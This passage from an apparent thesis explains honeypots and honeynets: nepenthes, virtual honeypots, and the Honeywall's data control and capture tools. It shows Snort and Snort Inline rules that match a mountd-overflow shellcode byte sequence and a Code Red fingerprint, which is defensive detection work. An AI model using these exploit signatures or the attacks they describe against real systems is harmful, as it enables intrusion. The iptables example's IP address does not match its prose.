interface (see Figure 2.1). Thereby, the deployment process of a decoy may be completed
within a short amount of time.
A more advanced variant of a low-interaction honeypot is subject of the following
section.
1
see
see
3
see
4
see
2
http://www.leurrecom.org/
http://all.net/dtk/download.html
http://www.alpinista.org/thp/
http://www.specter.com/
7
Figure 2.1: User Interface of the Low-Interaction Honeypot Specter
(Source: NETSEC, 2009)
2.4 Example of an Advanced Low-Interaction
Honeypot
A powerful variant of a low-interaction honeypot is nepenthes5 . It is open source, free
of charge, and is actively maintained by Paul Bächer, Markus Kötter, and several other
security professionals.
Nepenthes is particularly suitable for capturing self spreading malware on a large
scale, i.e., it is capable of downloading considerable amounts of worms, bots, and other
types of malicious software that are autonomously propagating in the wild (see Provos
and Holz, 2007). For instance, in a preliminary study, Goebel et al. (2007) succeeded
in retrieving more than 2,500 unique malicious binaries in a period of only 8 weeks.
Similar collections may help identify common threats on the Internet, generate statistics
about current attack patterns, and support the development of high-quality detection
signatures for antivirus scanners and other security-related applications.
5
http://nepenthes.carnivore.it/
8
Figure 2.2: Architecture of the Low-Interaction Honeypot nepenthes
(Source: Bächer et al., 2006)
With respect to its architecture, nepenthes is based on a flexible design and consists of various program modules that are required for capturing and processing the
different malware samples. In particular, Bächer et al. (2006) distinguish vulnerability
modules, shellcode parsing modules, fetch modules, submission modules, and logging modules. Their functionality is briefly illustrated in the following. An overview about the
individual components and their interaction is given in Figure 2.2.
The core of the low-interaction honeypot is formed by a number of vulnerability modules. These modules emulate known security weaknesses in Windows-specific system services, e.g., the Microsoft SQL Server 2000 database management system, the Microsoft
Internet Information Services 5.0 (IIS 5.0) web server, or the Distributed Component
Object Model (DCOM) interface (see Microsoft Corporation, 2002, 2003a,b). It is important to note, however, that nepenthes does not simulate the complete behavior of a
service, but rather certain program fractions that are of relevance to the vulnerability.
As Wicherski and Holz (2006) point out, these fractions are usually sufficient to deceive
malicious binaries and provoke an attack.
In comparison to other electronic baits, this approach has several advantages: First,
system requirements regarding processing resources and memory are quite low. As
a result, the solution is highly scalable, and multiple instances of nepenthes can be
deployed in parallel. Second, development efforts are dramatically reduced. For instance,
Bächer et al. (2006) note that a working module often comprises less than 500 lines of
source code. Due to the decreased level of complexity, honeypot administrators may also
quickly react to emerging threats. For example, in 2004, the Local Security Authority
9
Subsystem Service (LSASS) in the Microsoft Windows operating system was prone to
a so-called buffer overrun (see Microsoft Corporation, 2004c): A sophisticated attacker
could remotely overwrite sections of internal memory by sending a specially crafted
character sequence to the service. As a consequence, it was possible to execute arbitrary
malicious code and get in control of the underlying machine. Shortly after the release
of the official security bulletin, a Proof of Concept (PoC) paper was published that
successfully demonstrated the exploitation of the security weakness (see SecurityFocus,
2004; Wicherski and Holz, 2006). Based on this information, the nepenthes development
team was able to program a corresponding vulnerability module and simulate an affected
platform within a short amount of time. In consequence, it was possible to study the
penetration technique in more detail and quickly start capturing newly spreading attack
tools.
When an emulated service is compromised, the payload or shellcode of the attack
is passed to a shellcode parsing module. The shellcode is frequently stored within a
character array and contains instructions in assembly machine language that are injected
in the target program in order to manipulate its functionality (see Koziol et al., 2004).
The instructions must not include any null tokens though, because these are interpreted
as string terminators and may cause the attack to fail (see Aleph One, 1996). To properly
cope with this issue, adversaries usually encode their payload with exclusive or (XOR)
operators. As Bächer et al. (2006) argue, this procedure also helps evade certain sensors
of intrusion detection systems. Therefore, to restore the original payload used during
the intrusion, the parsing module must first decode the captured character sequence.
The result can then be examined with the help of regular expressions in the next step,
e.g., to find the source address of the respective binary.
This information is needed by the fetch modules to retrieve the sample from the
Internet. At the time of this writing, different transfer modes and network protocols
such as HTTP (Hypertext Transfer Protocol), FTP (File Transfer Protocol), or TFTP
(Trivial File Transfer Protocol) are supported. Furthermore, two special modules are
capable of dealing with IRC-related (Internet Relay Chat-related) propagation methods
that are favored by certain viruses, worms and other types of Internet threats (see Holz,
2005).
After a malicious file has been downloaded from its remote location, it can either
be stored on the local hard disk, sent to a central database, or directly to a sandbox
for further investigation. These tasks are performed by the submission modules. In
the latter case, the executable is safely launched within a controlled environment (see
Willems et al., 2007). Thereby, it is, for instance, possible to observe manipulations of
the file system structure, while mitigating the risk for uninvolved third parties as best
as possible.
Apart from the program modules, nepenthes offers a number of additional features that
facilitate collecting autonomously spreading malware on a large scale, including a virtual
file system and a rudimentary, emulated shell attackers can interact with. Moreover,
the software comprises sophisticated logging capabilities that even permit monitoring
10
penetration attempts in real time. Last but not least, with the DNS (Domain Name
System) resolver module and an internal geographic database, attacks can be efficiently
traced to their country of origin. In sum, security professionals are thus able to generate
extensive statistical reports about adversaries and their intrusion strategies.
Most of the components described above can be tweaked and adapted, making the
low-interaction honeypot a very flexible and powerful tool (see Bächer et al., 2006).
We will illustrate the individual configuration options of the decoy in more detail in
Chapter 4. We will also illustrate how a bootable device with a pre-configured, fully
working nepenthes sensor can be developed. This device can make the deployment of
numerous electronic baits significantly easier.
2.5 Deployment Options for Honeypots
There exist two basic deployment options for electronic baits (cmp. Provos and Holz,
2007): A physical honeypot runs on a dedicated machine with its own IP address on
the network. As a result, the decoy closely mimics the characteristics and behavior of
a real computer system. Thus, attackers may fully interact with the host and get in
complete control of the system platform. On the other hand though, physical honeypots
are “typically expensive to install and maintain” (see Provos and Holz, 2007, p. 11).
Furthermore, the solution is hardly scalable, because different components and devices
must be acquired for each machine. Consequently, hardware costs quickly skyrocket
when multiple electronic baits must be set up. With respect to this case, an alternative
and more reasonable approach is deploying several virtual honeypots on a single system.
A virtual honeypot is built on top of a virtual machine, i.e., an isolated, secure, and
reliable computing environment (see Creasy, 1981). It shares all its resources with the
underlying host system and possibly other guest systems that are executed in parallel
on the computer. A sample illustration of a virtual honeypot setup is presented in
Figure 2.3(a). In the given example, two guest systems with the private IP addresses
192.168.1.1 and 192.168.1.2 are installed on a host that is directly connected to the
Internet.
In order to prevent collisions between the guest systems, a special software layer,
the virtual machine monitor (VMM), simulates replicas of the physical components.
Thereby, each machine appears to have its own CPU (Central Processing Unit), memory,
graphics adapter, network interface, and I/O (Input/Output) interface (see Figure 2.3(b)
and Parmelee et al., 1972; Goldberg, 1974). As a consequence, security professionals can
maintain various decoys with different operating systems as well as applications on one
computer, while keeping hardware costs down at the same time.
In comparison to their physical counterparts, virtual honeypots also have a number of
additional benefits (cmp. Provos and Holz, 2007): First, the electronic baits are easier
to maintain, because they are stored as plain files on the underlying host system. Thus,
they can be copied, shared, and distributed without difficulty. This technique also
11
(a)
(b)
Figure 2.3: Setup and Architecture of a Virtual Honeypot
(Source: Provos and Holz, 2007; VMWare, 2006)
permits taking snapshots of a running system and saving its current state. Thus, it is
possible to quickly restore the configuration of a decoy after it has been compromised.
Regarding the implementation of the virtual environment, two software products are
primarily referenced in the literature (see also Honeynet Project, 2004b): The open
source application User-mode Linux6 (UML) by Jeff Dike is an architectural port to
the Linux interface (see Dike, 2006; Honeynet Project, 2002a). It creates an executable
binary of the core libraries. As a result, the kernel can be started as a normal process
in user space and boot a second, Linux-based operating system. System calls that are
sent to the UML instance are then transparently passed to the host and are processed
by the underlying machine. This behavior is illustrated in Figure 2.4.
Even though the approach helps create a guest system on the target platform, the UML
instance can be fingerprinted quite easily as demonstrated by Provos and Holz (2007).
Therefore, the authors strongly discourage from using the application for honeypots in
practice.
6
http://user-mode-linux.sourceforge.net/
12
Figure 2.4: Architecture of User-Mode Linux (Source: Based on Dike, 2006)
A more advanced technology are the virtualization software solutions that are offered
by VMWare7 . In the scope of this thesis, we focus on the free VMWare Server8 . The
application provides a comfortable graphical user interface for administrative tasks and
even permits configuring virtual machines remotely over the Internet. In contrast to
UML, the product supports both Linux and Microsoft Windows operating systems as
well as other platforms such as Sun Solaris and Novell NetWare. It is highly scalable and
emulates complete x86-based computer systems. Due to these characteristics, multiple,
concurrently running virtual electronic decoys can be deployed. What is more, with the
help of a virtual bridge that is set up during the installation process of the software,
each honeypot is assigned its own IP address and, thus, may act as an entirely separate
machine on the network (see Provos and Holz, 2007, p. 27). A high-level overview about
this architecture is shown in Figure 2.5.
In spite of these features, sophisticated adversaries are potentially able to detect the
virtual environment, e.g., by recognizing subtle differences in the hardware layer of a
machine (see Holz and Raynal, 2005a,b). In this case, the presence of a honeypot is
possibly revealed, and the device is likely to be evaded in the future as we have already
explained. As Provos and Holz (2007, p. 22) conclude, the approach may thus “lead to
less information about attackers”.
7
8
http://www.vmware.com/
http://www.vmware.com/products/server/
13
Figure 2.5: Illustration of the Bridged Networking Functionality in VMWare
(Source: Based on Provos and Holz, 2007)
2.6 Summary
In this chapter, we have presented the methodic and technical concepts of honeypots.
Honeypots are computer systems which are intentionally designed insecurely. They act
as electronic baits and enable security professionals to learn more about the tools, tactics,
and motives of adversaries. When they are deployed within a productive environment,
they can help detect penetration attempts at the network perimeter and protect the
resources of an organization against Internet threats.
Because all interactions with a decoy are malicious by definition, captured data sets
are quite small. Moreover, in comparison to traditional monitoring stations such as
intrusion detection systems, the number of encountered false positives is significantly
lower.
In dependence of the level of involvement and risk, we have distinguished two types
of electronic baits: A high-interaction honeypot offers attackers a real operating system
to interact with. In contrast, a low-interaction honeypot only emulates specific system
services. Neither of these solutions is superior to the other. Both approaches rather have
their own advantages and disadvantages, as it is indicated in Table 2.1 (see also Honeynet
Project, 2004b; Provos and Holz, 2007). For this reason, the individual characteristics of
the technologies must be carefully judged, particularly with regard to the organizational
objectives (cmp. Spitzner, 2001b, 2002).
We have also differentiated between physical and virtual honeypots: A physical honeypot runs on a dedicated machine with its own IP address and closely mimics the behavior
of a real computer system. On the other hand, a virtual honeypot is executed within a
separate and secure computing environment. Since system resources are shared between
the individual guest systems, it is possible to deploy multiple decoys on a single host.
Thereby, hardware costs and maintenance efforts can be effectively reduced.
14
Low-Interaction Honeypots
easy installation, configuration, and deployment
limited information capturing capabilities,
e.g., authentication credentials entered by
the adversary
possibility to generate statistics at a
higher level of abstraction
minimal risk, because solely emulated services are exposed to attacks
High-Interaction Honeypots
increased complexity, harder to install and
to maintain
extensive information capturing capabilities
possibility to analyze intrusions in detail, including tools, communications, and
keystrokes of adversaries
higher risk as attackers are offered complete operating systems and fully working
services to interact with
Table 2.1: Advantages and Disadvantages of Low-Interaction and
High-Interaction Honeypots
We have given an overview about two software products that are capable of setting
up a virtual environment: User-mode Linux patches the system core in order to execute
numerous instances of a Linux-based operating system on top of the host kernel. The
virtualization software VMWare emulates a complete x86-based computer systems and
supports a variety of different operating systems. In the scope of this thesis, we focus on
the freely available VMWare Server. It offers a comfortable user interface that makes
the administration of our virtual honeypots significantly easier.
It is important to note though that the value of electronic baits can be highly increased
when they are linked in a so-called honeynet. We will have a closer look on this technology
in the next chapter.
15
In the previous chapter, we have illustrated the concept and value of honeypots. Individually deployed electronic baits share a common problem though: As stand-alone
systems, they have a narrowed field of view, i.e., they do not capture malicious activities,
unless they are attacked directly (see Spitzner, 2002, 2003a). Therefore, a more meaningful approach is building a so-called honeynet and learn about security-related incidents
on a network-wide scope. It is then possible to link data accumulated from different
machines, e.g., to create a more accurate profile of adversaries after an intrusion.
A honeynet is a group of honeypots that are set up and interconnected behind a special gateway with monitoring and filtering capabilities (cmp. Honeynet Project, 2004b;
Curran et al., 2005). As such, a separated, highly controlled environment can be created
as indicated in Figure 3.1. Similar to a honeypot, the purpose of a honeynet lies in
being probed, attacked, and compromised (see Honeynet Project, 2006). However, in
comparison to a single system, information collected about threats is more expressive
and, hence, more valuable as we have already noted above. On the other hand, the level
of complexity is significantly higher. That is why, certain guidelines have been proposed
in order to safely deploy a honeynet.
According to the Honeynet Project (2004a), the most important aspect that needs to
be considered is data control. Data control is defined as the “containment of activity”
(Honeynet Project, 2004b, p. 37), i.e., attackers must be prevented from affecting nonhoneynet systems (see Honeynet Project, 2005e). This request often turns out to be
difficult to realize in practice, because organizations need to find a tradeoff between
freedom and risk (cmp. Honeynet Project, 2004b): If adversaries are granted a higher
degree of freedom, their behavior can be studied in detail, but the level of risk rises in
parallel as well. Therefore, to mitigate threats as best as possible, several best practices
have proven helpful: First, at least two different data control mechanisms and layers
should be used to avoid a single point of failure. Second, implementations should permit
manual intervention. Third and last, the system should completely block access to the
honeynet in case all layers collapse.
A second major element that must be taken into consideration when building a honeynet is data capture. This refers to the “monitoring and logging of all the blackhat’s
activities” (Honeynet Project, 2004b, p. 39). In compliance with data control, it is
suggested to implement multiple layers in order to observe adversaries as closely as
possible.
With regard to the the third factor, data analysis, it is crucial to store log files and
other records created during incidents outside the honeynet in a secure location to en-
16
Figure 3.1: Overview about the Honeynet Architecture
(Source: Based on Honeynet Project, 2006)
sure the integrity of the captured data. Administrators are also advised to maintain
standardized reports of each compromise. This approach facilitates a later classification
of the observed intrusions and helps learn the tools, tactics, and motives of attackers
(cmp. Honeynet Project, 2006).
As we will see, the technical implementation of the individual guidelines and requirements as described has changed significantly throughout the years (see also Honeynet
Project, 2005d). Therefore, we first give a brief overview about historical honeynet
architectures in Section 3.1. The current technologies and tools in use are subject of
Sections 3.2 and 3.3. In Section 3.4, we illustrate the deployment process of a virtual
honeynet and outline the setup of a future solution, so-called distributed honeynets. We
conclude with a summary of the different concepts and methodologies in Section 3.5.
17
3.1 Historical Implementations of Honeynets
A preliminary version of a honeynet was already deployed in 1987 by the system manager
Cliff Stoll (see Stoll, 2005). While working at the Lawrence Berkeley Lab, Stoll detected
penetration attempts on multiple computer systems. He decided to watch the intruder
over a period of several months and used rudimentary data capture and data control
mechanisms. For instance, he created various interesting-sounding files that served as
electronic decoys. Thereby, Stoll hoped to distract the attacker from other vulnerable
network segments, while learning as much as possible about his intentions and motives
at the same time. With the collected information, he was finally able to track down the
adversary and uncover a severe case of industrial espionage.
The first organizational honeynet solution was developed in 1999 by members of the
Honeynet Project Research Alliance (see Honeynet Project, 2004b). The central element
of the so-called GenI honeynet was formed by a conventional firewall. When a decoy
was compromised, all outgoing network connections were blocked after a predefined limit
had been reached. With the help of this simple data control mechanism, the external
environment could be protected against automated scans and other types of malicious
activities (see Spitzner, 2003b).
On the other hand, data capture requirements were met by installing an intrusion
detection system that recorded all inbound as well as outbound traffic flows. In case
an alert was recognized, the device sent a notification message to a remote log server.
Thereby, captured data sets could be effectively guarded against deletion and manipulation. The interaction between the different components is illustrated in Figure 3.2.
With first generation honeynets, security professionals were able to study the behavior of autonomously propagating malware and low-skilled adversaries. In spite of these
capabilities, the architecture suffered from several drawbacks (cmp. Honeynet Project,
2004b): First, network operations were entirely based on the TCP/IP network layer
of the OSI (Open Systems Interconnection) reference model (see Stevens, 1994; Comer,
2000, for a complete description of the different network layers). As a result, all devices,
including the firewall, the intrusion detection system, and the log server, were assigned
their own IP addresses and were publicly accessible over the Internet. As participants
of the Honeynet Project (2004b, p. 96) explain, “this reveal(ed) their existence to the
probing blackhat, so the risk of becoming possible targets (was) high”. Second, as numerous software applications had to be installed and maintained, the deployment of a
GenI honeynet was time-consuming and error-prone. Furthermore, stealthily capturing keystrokes as well as analyzing encrypted sessions was exceedingly complex (cmp.
Spitzner, 2002), even though various tools helped facilitate this process (see Antonomasia, 2003; Floydman, 2002).
In order to cope with these issues, the system setting was completely redesigned in
2001 and led to the development of new and advanced variants, so-called GenII and
GenIII honeynets. We will present their functionality in the following sections.
18
Figure 3.2: Architecture of a GenI Honeynet
(Source: Based on Honeynet Project, 2004b)
3.2 GenII Honeynets
In comparison to first generation honeynets, GenII honeynets are more powerful and
more efficient with regard to their observation capabilities, their detectability, and their
ease of maintenance (cmp. Honeynet Project, 2004b). These key benefits result from
two major architectural characteristics: First, the honeynet gateway is implemented
as a transparent bridge (see Honeynet Project, 2005e). A bridge connects separated
networks and operates as a data link on the second layer of the OSI reference model
(cmp. Perlman, 1999). Data packets sent over this layer are known as frames and store
a 48-bit number, the so-called Media Access Control (MAC) address. When a frame
arrives at a bridge, its MAC address is extracted and looked up in an internal system
table to identify its physical destination. If a matching entry is found, the frame is
forwarded to its designated location. Otherwise, it is broadcasted to every network
except the one it was received on (see Tanenbaum, 2003).
It is important to note that these operations have no effect on protocols working on
higher network layers, e.g., IP. As a consequence, a number of popular reconnaissance
attacks are rendered useless (cmp. Honeynet Project, 2004b). For instance, adversaries
often execute a traceroute command to monitor the TTL (Time to Live) field in
the header of an IP packet enroute to a target. Because each intermediary machine
decrements the TTL value by one (see Postel, 1981b), the presence of firewalls and IDSs
can be easily discovered. On the other hand, when an IP packet passes through a bridge,
19
Figure 3.3: Architecture of a GenII Honeynet
its TTL field is not modified. Therefore, an instance of the honeynet gateway is hard
to detect. Moreover, compromising the device directly is difficult as well, because the
bridging network interfaces do not have their own IP addresses (cmp. Honeynet Project,
2004b). However, it is still possible to administrate the gateway system over a remote
connection as indicated by the dotted line in Figure 3.3. For this purpose, a third
network interface card (NIC) is required.
The second difference to GenI honeynets concerns the implementation of data control
and data capture measures. Instead of deploying the required tools on separate machines,
all applications are installed on the gateway system. Thus, malicious activities may
effectively be blocked at a central point whenever it is desired. Because of this behavior,
the honeynet gateway is also often referred to as the Honeywall. We will cover the
individual components of the Honeywall according to their function in the following.
3.2.1 Data Control Implementations
GenII honeynets use a combination of filtering and intrusion detection mechanisms to
control inbound and outbound network traffic. The tools used on the Honeywall are
netfilter, IPTables, and Snort Inline.
• Netfilter and IPTables
Network packets can be intercepted and manipulated on the honeynet gateway with the
netfilter software1 . Netfilter operates on the kernel level and provides sophisticated rout1
see http://www.netfilter.org/
20
Figure 3.4: Network Filtering Capabilities of the Honeynet Gateway
ing and filtering capabilities that are required to implement a fully functional network
firewall (cmp. Russell, 2002).
Whenever a packet is about to enter or leave the honeynet, it is processed on the
Honeywall and compared against a set of internal rules. Based on these rules, pre-defined
actions can be taken. For instance, the packet may get accepted and be forwarded to the
target machine, as it is indicated in Figure 3.4. Alternatively, it may also be rejected, e.g.,
to protect specific network segments and mitigate risks for uninvolved third parties as
best as possible. A short description of the individual actions can be found in Table 3.1.
Netfilter rules can be manipulated in user space with the help of the IPTables2 interface
that was developed by Rusty Russell. For instance, to define a firewall exception for
the honeypot with the IP address 192.168.1.2, we invoke the application with the -A
parameter as follows:
iptables -A INPUT -p tcp -- dport 22 -d 192.168.2.1 -j ACCEPT
In the given example, we add a new rule to the packet filter in order to accept (-j parameter) inbound (INPUT parameter), TCP-based traffic flows (-p parameter), targeting
2
see http://www.netfilter.org/projects/iptables/index.html
21
Action
ACCEPT
DROP
LOG
REJECT
QUEUE
Description
The packet is free to continue its path.
The packet is silently rejected without sending an error message to
the originator.
The packet is logged with a user-defined informational text.
The packet is rejected, and an error message is sent to the originator.
The packet is placed on the queue and may be accessed by a user
space process.
Table 3.1: List of Possible netfilter Actions
(Source: Based on Honeynet Project, 2004b, p. 103)
State
NEW
ESTABLISHED
RELATED
INVALID
Description
The packet initiates a fresh connection.
The packet belongs to an existing connection that transfers data
in both directions.
The packet is related to an existing connection, for example an
FTP session.
The packet could not be processed correctly and should generally
be dropped.
Table 3.2: List of Connection States as Distinguished by IPTables
(Source: Honeynet Project, 2004b; Russell, 2002)
the secure shell server on port 22 (--dport parameter) of the decoy (-d parameter). A
complete overview about the myriad of IPTables commands and parameters is given by
Russell (2002).
In addition to the firewall rules, two components of IPTables are particularly relevant
for implementing efficient data control mechanisms on the Honeywall: With the help of
the state module, we are able to define fine-grained filter rules based on the connection
state a packet is in (see Table 3.2). As a result, we can efficiently keep track of different
network sessions. With the second, limit module, it is possible to restrict the maximum
number of packets that are processed within a given time interval: After the specified
limit has been reached, further packets are automatically discarded.
The two components operate collaboratively on the gateway system. This functionality is called Connection Rate Limiting Mode (CRLM) and is particularly useful for
preventing Denial of Service (DoS) attacks that are launched from compromised honeypots. In the course of a DoS attack, all resources of a system are consumed. As a
consequence, services may not be accessed by legitimate users any longer (cmp. Moore
et al., 2006). A well-known example for this type of incident is a SYN Flood (see CERT,
1996). The attack exploits an idiosyncrasy in the architecture of the TCP protocol: TCP
22
(a)
(b)
Figure 3.5: Illustration of a Full and a Half-Open TCP Handshake
connections must be established with a so-called handshake (see Postel, 1981c; Stevens,
1994). The client initiates the communication channel by sending a synchronize (SYN)
request to the server. The server acknowledges the request and returns a packet with
both the SYN and ACK flags set. In turn, the client confirms the reply with a third
packet to complete the handshake. This process is illustrated in Figure 3.5(a). If the
last packet is not sent, however, the connection is left half-open (cmp. CERT, 1996, and
Figure 3.5(b)). Thus, internal memory on the server is consumed. Consequently, if an
adversary initiates a huge number of connections but does not acknowledge messages
from the server, storage capacities are eventually exceeded. As a result, the performance
level is degraded, and the target machine finally collapses. To prevent system crashes,
Bernstein (1996) has proposed the use of SYN Cookies: Rather than maintaining a large
TCP stack, the server calculates a specially crafted initial sequence number and entirely
stores state-specific information about the connection in its response packet (see also
Eddy, 2007). When the client replies with the final packet, the sequence number is
checked, the connection state is restored, and the handshake is completed. On the other
hand, flooding operations do not exhaust system resources any longer, but solely require
temporary processor cycles.
A different approach to cope with DoS attacks is implemented on the Honeywall:
As soon as a certain number of connections has been established, the gateway device
stops forwarding packets going out of the honeynet. Thereby, outbound network traffic
can be controlled, and the external environment is protected. In practice, about 20
TCP connections, 20 UDP connections, 50 ICMP connections, and 10 other, non-IP
connections per hour are regarded as adequate values (see Honeynet Project, 2005a).
It is important to emphasize though that these settings are not sufficient to mitigate
all potential threats. As Provos and Holz (2007, p. 65) point out, “connection limiting
does not help if the attacker uses a specific exploit against another host”. With respect
to this scenario, we must rely on Snort Inline, a second data control mechanism of the
Honeywall. We outline the functionality of this application in the following.
23
• Snort Inline
Snort Inline3 operates as a network intrusion prevention system (NIPS) on the honeynet
gateway and is capable of efficiently blocking attacks going out of the honeynet. It
closely interacts with the IPTables packet filtering software as follows: Data streams of
outbound network packets are inspected by the NIDS to assess the level of risk for the
external environment. If a potentially dangerous pattern is found, control is passed to
the firewall, and the respective packet is dropped. This process is illustrated in Figure 3.6
and is known as Packet Drop Mode (PDM) (see Honeynet Project, 2004b, 2005e).
It is crucial to note though that packet dropping does not affect legitimate, nonthreatening traffic flows. For example, outgoing DNS (Domain Name System) queries
or NTP (Network Time Protocol) requests may safely pass the Honeywall without interference. Because of these characteristics, the presence of the gateway device can be
effectively concealed from the eyes of probing blackhats (see Honeynet Project, 2004b).
In addition, Snort Inline also supports a so-called Packet Replace Mode (PRM) which
permits even more powerful and stealthy operations. In contrast to PDM, a suspicious
packet is not completely dropped, but solely specific sections in its header or body are
modified. As a result, the malicious payload can be rendered ineffective. An example of
a PRM rule that mutates the exploit code of the NFS mountd buffer overflow attack is
shown in Listing 3.1 (cmp. Caswell et al., 2007, p. 614). The attack targets a running
NFS (Network File System) server on port 635 which is frequently used to share files over
the network (see CERT, 1998). By overwriting an internal memory buffer, an adversary
may spawn a remote shell and execute arbitrary code with administrative privileges.
Thereby, full control of the underlying system platform may be gained.
Figure 3.6: Packet Drop Mode (PDM) of Snort Inline
3
see http://snort-inline.sourceforge.net/
24
1
2
3
4
5
6
7
8
alert udp $EXTERNAL_NET any -> $HOME_NET 635
( msg :" EXPLOIT x86 Linux mountd overflow ";
content :"| EB56 5 E56 5656 31 D2 8856 0 B88 561 E |";
r e p l a c e :"|6565 6565 6565 6565 6565 6565 6565|";
reference : cve , CVE -1999 -0002;
reference : bugtraq ,121;
classtype : attempted - admin ;
sid :316; rev :3;)
Listing 3.1: Sample Rule for the Packet Replace Mode (PRM) of Snort Inline
As can be seen on Line 3 of Listing 3.1, the exploit can be identified with the data
sequence EB56 5E56 5656 31D2 8856 0B88 561E. If the string is observed in a packet
stream, it it automatically replaced with a number of tokens, in this case, a series of
simple e letters with the corresponding hexadecimal value Ox65. As a consequence,
the shellcode cannot be successfully executed any longer, and the compromise attempt
fails (see also Caswell et al., 2007).
Writing PRM rules requires a thorough knowledge and deep understanding of the
individual exploit functions (see Honeynet Project, 2004b). On the other hand, the
technology facilitates observing intruders for longer periods of time: As Provos and Holz
(2007, p. 65) point out, “given the difficulties of making exploits work in the wild (...),
there is a high probability that intruders would not detect the presence of the Honeywall
for some time and therefore continue to try different forms of attacks”.
3.2.2 Data Capture Implementations
Similar to data control implementations, security professionals rely on multiple data
capture layers in order to study the behavior and intentions of adversaries. The prevalent
tools and applications that are required for these tasks are presented in more detail in
the following sections.
• IPTables and Swatch
We have already introduced IPTables as a powerful data control mechanism. Due to its
sophisticated routing and filtering capabilities, risks for uninvolved third parties can be
mitigated. On the other hand, the software may be effectively used for data capturing
activities as well: In cooperation with the syslogd daemon of the operating system,
network connections can be logged to the file /var/log/messages. More importantly,
with the help of Swatch, it is possible to automatically send email messages about specific
events within the honeynet. Thus, administrators are able to quickly react to incidents,
if this proves to be necessary.
25
1
2
3
watchfor / Firewall : OUTBOUND CONNECTION /
echo normal
mail = admin@honeynet . org , subject = Outbound Connection
4
# l i m i t t h e number o f e m a i l a l e r t s t o one m e s s a g e p e r h o u r
throttle 1:0:0
5
6
Listing 3.2: Example of a Swatch Configuration File
Swatch4 (Simple Watcher) is a Perl-based utility that was developed by Todd Atkins
for monitoring system log files in real time (see Hansen and Atkins, 1993). When a new
log record is created, it is matched against certain patterns that are listed in the main
configuration file of the application. A pattern can be a simple word or a more complex
regular expression (see Bauer, 2001). If a match is found, a notification procedure is
triggered, and an alert is mailed to a pre-defined contact person. For instance, in the
sample configuration file shown in Listing 3.2, the supervisor of a honeynet is informed
about outbound network connections. These types of messages must generally be taken
seriously, because they potentially indicate the successful compromise of a decoy (cmp.
Honeynet Project, 2004b). However, for maintenance reasons, we recommend to limit
the number of generated warnings, using the throttle keyword as illustrated in Line 6 of
Listing 3.2 (see also Spitzner, 2000). Thus, Swatch solely sends a summary report about
logged elements in a given time interval, in our case, a period of one hour. According to
our experiences, this value is acceptable for responding to security-related occurrences
within the honeynet in time.
• Snort
The open source network intrusion detection system (NIDS) Snort5 forms the second
data capturing layer on the Honeywall. It supports two different runtime modes: In
packet sniffing and logging mode, Snort records all traffic flows that are about to enter
or leave the honeynet. Data streams are saved as raw binary files. Thereby, the data
capture process is significantly accelerated, because network packets are not converted
into a human-readable format first (see Caswell et al., 2007). In addition, the generated
files can be directly imported into network analysis and forensic applications such as
Tcpdump6 or Wireshark7 . As we will see in Chapter 5, these applications are very
powerful and greatly facilitate the investigation of an incident. For example, it is possible
to restore a FTP session that was initiated in the course of a system compromise and
recover the steps of the intruder.
4
see
see
6
see
7
see
5
http://swatch.sourceforge.net/
http://www.snort.org/
www.tcpdump.org/
www.wireshark.org/
26
1
2
#r u l e h e a d e r
alert tcp $EXTERNAL_NET any -> $INTERNAL_NET 80
3
# rule options
( msg : " WEB - IIS CodeRed v2 root . exe access " ;
flow : to_server , established ;
uricontent : " / root . exe " ; nocase ;
reference : url , www . cert . org / advisories / CA -2001 -19. html ;
classtype : web - application - attack ;
sid :1256; rev :8;)
4
5
6
7
8
9
10
Listing 3.3: Sample Rule of the Snort Intrusion Detection System
When running in intrusion detection mode, Snort inspects each packet based on a list
of attack-specific detection rules in order to discover potentially dangerous operations.
A detection rule consists of a header and corresponding rule options. The header defines
the action that is taken in case a threat is discovered, the transport protocol used by
the packet, as well as basic IP and port matching criteria. The rule option section
contains processing-related instructions and metadata information, e.g., references to
relevant security advisories (cmp. Caswell et al., 2007). A complete overview about the
individual rule components is given by Sourcefire (2009).
An example of a Snort rule is shown in Listing 3.3 (cmp. Caswell et al., 2007, p. 302).
It affects TCP-specific traffic flows that enter the honeynet on an arbitrary port and
are destined for web servers running on port 80. As can be seen on Line 7, suspicious
packets are identified by the string /root.exe, a fingerprint of the Code Red worm. The
worm caused severe havoc in 2001 and is still propagating in the wild at the time of this
writing (cmp. CERT, 2001a,b, and Chapter 5). If the string pattern is detected, an alert
message is generated on the Honeywall (cmp. Line 1 of Listing 3.3), and the incident is
logged.
However, it is important to note that worm attacks and particularly new types of
malicious activities can only be properly recognized if the Snort rule set is carefully kept
up to date at all times. With the help of Oinkmaster8 that is part of the Honeywall,
this process can be significantly facilitated. Oinkmaster automatically downloads the
latest signatures from a pre-defined rule repository (see Östling, 2006). It is capable of
importing both the official, high-quality definitions that are commercially distributed by
the Vulnerability Response Team (VRT)9 as well as slightly reduced versions that are
provided free of charge by members of the Snort community10 .
A severe downside of intrusion detection systems is their inability to cope with encrypted network traffic (cmp. Honeynet Project, 2004b). Consequently, if adversaries
establish connections over secure protocols such as TLS (Transport Layer Security) or
8
see http://oinkmaster.sourceforge.net/
see http://www.snort.org/vrt/buy-a-subscription
10
see http://www.snort.org/snort-rules
9
27
SSL (Secure Sockets Layer), penetration attempts cannot be reliably monitored any
longer. In order to solve this problem, a third data capture layer needs to be implemented. A description of this layer is subject of the next section.
• Sebek
As participants of the Honeynet Project (2004b) explain, intruders frequently use encryption techniques to protect their communication channels from network surveillance
devices. Common cryptographic algorithms such as AES (Advanced Encryption Standard, see NIST, 2001) or 3DES (Triple Data Encryption Standard, see NIST, 1999) are
extremely difficult to break, even though a number of attack strategies have been developed more recently (see Bernstein, 2005; Osvik et al., 2006; Lucks, 1998). In spite of
these efforts, the algorithms are considered to be secure at the time of this writing. Thus,
to effectively observe the behavior of adversaries, security professionals must circumvent
the respective encryption routines. The open source utility Sebek11 makes these types of
operations comparatively easy by intercepting network packets after they have passed
the decryption engine of the operating system (see Honeynet Project, 2003c). It is available free of charge for different system platforms, including Linux, Microsoft Windows,
OpenBSD, and Solaris. In the scope of this thesis, we focus on the Linux-based version
of the software, although the concepts outlined below can also be applied to most other
distributions.
With respect to its system architecture, Sebek consists of a client and a server component. The client must be installed on each decoy within the honeynet. In contrast,
the server runs within a central location on the Honeywall.
On the side of the client, Sebek is capable of collecting extensive information about
attackers. In particular, the application can record the keystrokes of miscreants as well
as recover the tools that were transferred to a honeypot in the course of a compromise.
For these purposes, the internal System Call Table of the kernel must be manipulated.
To be more precise, Sebek redirects specific system calls, e.g., to the internal read()
